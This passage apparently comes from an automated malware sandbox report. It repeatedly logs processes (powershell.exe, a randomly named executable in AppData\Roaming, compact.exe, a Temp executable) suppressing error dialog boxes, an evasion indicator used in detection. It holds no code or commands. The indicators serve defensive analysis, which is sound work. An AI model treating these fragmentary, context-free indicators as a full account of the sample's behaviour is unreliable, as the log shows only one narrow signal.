              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
